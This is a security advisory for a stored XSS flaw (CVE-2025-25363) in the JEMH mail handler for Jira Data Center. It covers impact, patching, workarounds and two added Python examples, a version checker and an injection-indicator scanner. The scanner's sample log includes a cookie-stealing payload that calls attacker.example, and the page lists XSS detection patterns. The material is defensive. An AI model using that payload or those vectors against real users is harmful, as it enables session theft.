CVE-2025-25363
📋 TL;DR
An authenticated stored cross-site scripting (XSS) vulnerability in The Plugin People Enterprise Mail Handler for Jira Data Center (JEMH) allows an attacker who already holds Administrator privileges to inject JavaScript into the HTML template fields of the app. The stored script then executes in the browser of any other user who views the affected templates, with that user's session and privileges. Only Jira Data Center instances running JEMH versions before 4.1.69-dc are affected.
💻 Affected Systems
- The Plugin People Enterprise Mail Handler for Jira Data Center (JEMH)
📦 What is this software?
Enterprise Mail Handler by Thepluginpeople
⚠️ Risk & Real-World Impact
Worst Case
An attacker who already holds Jira Administrator rights plants a payload that runs in the browser of every other user who renders the template. The script can read session material, issue requests as the victim (even if the session cookie is HttpOnly, a script running in the page can still call Jira's own endpoints with the victim's session), redirect the victim to attacker-controlled sites, or change Jira configuration with the victim's rights.
Likely Case
Session hijacking or data exfiltration from users who view the malicious templates. Because Jira distinguishes Jira Administrators from System Administrators, a template viewed by a higher-privileged administrator is also a privilege-escalation path for the attacker.
If Mitigated
Limited impact if proper access controls restrict Administrator privileges to trusted personnel only.
🎯 Exploit Status
Exploitation requires an authenticated account with Administrator access, so an external attacker first needs to obtain or compromise such an account. A public GitHub repository contains proof-of-concept details.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.1.69-dc
Vendor Advisory: https://marketplace.atlassian.com/apps/4832/enterprise-mail-handler-for-jira-jemh/version-history?versionHistoryHosting=dataCenter
Restart Required: Yes
Instructions:
1. Log into Jira Data Center as an Administrator.
2. Navigate to Manage apps (Add-ons on older versions).
3. Locate the Enterprise Mail Handler for Jira (JEMH) app.
4. Update to version 4.1.69-dc or later.
5. Restart the Jira services.
🔧 Temporary Workarounds
Restrict Administrator Access
Limit JEMH Administrator privileges to essential, trusted personnel only; the vulnerability cannot be triggered without that role.
Input Validation
Implement additional validation/sanitization for HTML template fields (for example, a review step that rejects script tags, event-handler attributes and javascript: URLs before a template goes live). Treat this as defense in depth, not a substitute for the patch: hand-written HTML filtering is easy to bypass.
🧯 If You Can't Patch
- Review and audit all users with JEMH Administrator privileges immediately.
- Implement Content Security Policy (CSP) headers to restrict script execution. Test a policy in report-only mode first: Jira's own interface relies on inline scripts and a strict script-src can break the UI, so a policy that is loose enough for Jira may not block an inline XSS payload.
🔍 How to Verify
Check if Vulnerable:
Check JEMH plugin version in Jira Data Center admin interface. If version is below 4.1.69-dc, system is vulnerable.
Check Version:
Check via Jira admin UI: Manage apps → Enterprise Mail Handler for Jira (JEMH) → Version
Verify Fix Applied:
Confirm the JEMH version is 4.1.69-dc or higher after the update. Then, on a non-production instance, save a harmless marker payload (such as an image tag with an onerror handler that only writes to the console) into a template HTML field and confirm it is rendered as escaped text rather than executed when the template is viewed.
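A scripted version check for the step above, written as an added example rather than code from the advisory or from The Plugin People. It reads the installed-app list from Jira's Universal Plugin Manager REST endpoint (/rest/plugins/1.0/, which requires an administrator account) and compares the JEMH version against the fixed release. The plugin key used here is a placeholder assumption; read the real key from the Manage apps page before running it against a live instance. The sample UPM response embedded below is constructed so the comparison logic runs offline.

```python
"""Check whether the installed JEMH version is below the fixed release.

Added example, not part of the advisory or of the vendor's code.
ASSUMPTION: JEMH_KEY is a placeholder; take the real plugin key from
Manage apps before running the live query.
"""
import base64
import json
import re
import urllib.request

FIXED_VERSION = "4.1.69-dc"
JEMH_KEY = "com.example.jemh-placeholder"  # ASSUMPTION: not the real key


def parse_version(v):
    """'4.1.69-dc' -> (4, 1, 69).

    The '-dc' suffix marks the hosting flavour, not an ordering, so it is
    dropped. Non-numeric segments are treated as 0 rather than failing.
    """
    core = v.split("-", 1)[0]
    parts = []
    for piece in core.split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def is_vulnerable(installed, fixed=FIXED_VERSION):
    """True when the installed version sorts before the fixed version."""
    return parse_version(installed) < parse_version(fixed)


def find_plugin(upm_json, key=JEMH_KEY):
    """Return the UPM entry for the given plugin key, or None."""
    for plugin in upm_json.get("plugins", []):
        if plugin.get("key") == key:
            return plugin
    return None


def assess(upm_json, key=JEMH_KEY):
    """Summarise install state and vulnerability for one plugin key."""
    plugin = find_plugin(upm_json, key)
    if plugin is None:
        return {"installed": False, "version": None, "vulnerable": False}
    return {
        "installed": True,
        "version": plugin["version"],
        "enabled": plugin.get("enabled", False),
        "vulnerable": is_vulnerable(plugin["version"]),
    }


def fetch_upm(base_url, user, password):
    """Live query of the UPM plugin list (administrator credentials needed).

    Basic auth is shown; a Jira DC personal access token can be sent as
    'Authorization: Bearer <token>' instead.
    """
    req = urllib.request.Request(base_url.rstrip("/") + "/rest/plugins/1.0/")
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


# Constructed sample in the shape of a UPM response; not from a real system.
SAMPLE_UPM = {
    "plugins": [
        {"key": "com.atlassian.jira.jira-core-reports-plugin",
         "version": "1.0", "enabled": True},
        {"key": JEMH_KEY,
         "name": "Enterprise Mail Handler for Jira (JEMH)",
         "version": "4.1.68-dc", "enabled": True},
    ]
}

if __name__ == "__main__":
    # Offline run against the constructed sample; swap in fetch_upm(...) for a live check.
    print(assess(SAMPLE_UPM))
```

The comparison deliberately ignores the hosting suffix so that 4.1.69-dc and 4.1.69 compare equal; if the instance reports a version string in a format not covered here, inspect it by hand rather than trusting the numeric parse.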
📡 Detection & Monitoring
Log Indicators:
- Unusual template modifications by Administrator users, especially by accounts that do not normally touch JEMH configuration or outside working hours
- JavaScript injection patterns (script tags, on* event handlers, javascript: URLs) in template update logs. Jira's standard application log records the request path and user, not the posted template body, so this indicator needs the template content to be logged or audited somewhere you can query.
Network Indicators:
- Unexpected external requests from Jira users' browsers
- Suspicious script loading in HTTP responses
SIEM Query (Splunk-style; adjust the source to where your template content is actually logged, for example atlassian-jira.log if template updates are written there):
source="atlassian-jira.log" AND ("template" AND "update" AND ("script" OR "javascript" OR "onload" OR "onerror"))
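The SIEM query above only matches a handful of literal keywords. The following added example (not from the advisory or the vendor) implements the same detection in code so it can run over exported log lines and, because it works on raw template text, it doubles as the pre-save check suggested under Input Validation. It goes beyond the query: it is case-insensitive, catches any on* event handler rather than two, flags javascript: and data:text/html URLs, srcdoc and script-capable elements, and decodes HTML entities first so an encoded payload such as &#x6a;avascript: is not missed. The log lines and request paths below are constructed for illustration and are not JEMH's real logging format.

```python
"""Scan JEMH template HTML (or log lines carrying it) for script-injection indicators.

Added example, not part of the advisory or the vendor's code. The log
format and paths in LOG_LINES are constructed for illustration only.
"""
import html
import re

# Indicator name -> pattern. Patterns run on entity-decoded text.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_url": re.compile(r"javascript\s*:", re.I),
    "data_url": re.compile(r"\bdata\s*:\s*text/html", re.I),
    "srcdoc": re.compile(r"\bsrcdoc\s*=", re.I),
    "script_capable_element": re.compile(r"<\s*(svg|iframe|object|embed)\b", re.I),
}


def normalise(text):
    """Decode HTML entities and drop control characters used to split keywords.

    '&#x6a;avascript:' becomes 'javascript:' so the plain pattern matches.
    """
    decoded = html.unescape(text)
    return re.sub(r"[\x00-\x08\x0b\x0c\x0e-\x1f]", "", decoded)


def scan(text):
    """Return the sorted list of indicator names found in the text."""
    normalised = normalise(text)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(normalised))


def scan_log(lines):
    """Return (line, indicators) for every log line that trips an indicator."""
    hits = []
    for line in lines:
        found = scan(line)
        if found:
            hits.append((line, found))
    return hits


# Constructed sample log lines (format and paths invented for this example).
LOG_LINES = [
    '2025-02-10 09:14:02,118 INFO admin /secure/admin/template-update '
    'body="Welcome <b>{{issue.key}}</b>"',
    '2025-02-10 09:15:40,902 INFO admin /secure/admin/template-update '
    'body="<img src=x onerror=\'fetch(\\"https://attacker.example/\\"+document.cookie)\'>"',
    '2025-02-10 09:16:01,004 INFO admin /secure/admin/template-update '
    'body="<a href=\\"&#x6a;avascript:alert(1)\\">open</a>"',
]

if __name__ == "__main__":
    for line, found in scan_log(LOG_LINES):
        print(found, "<-", line)
```

Because the scanner decodes entities before matching, a legitimate template that shows an escaped example (for instance the text "&lt;script&gt;") is also flagged; treat a hit as a triage signal to be reviewed against the template change history, not as proof of an attack, and expect the event-handler pattern to occasionally match innocent attribute-like text.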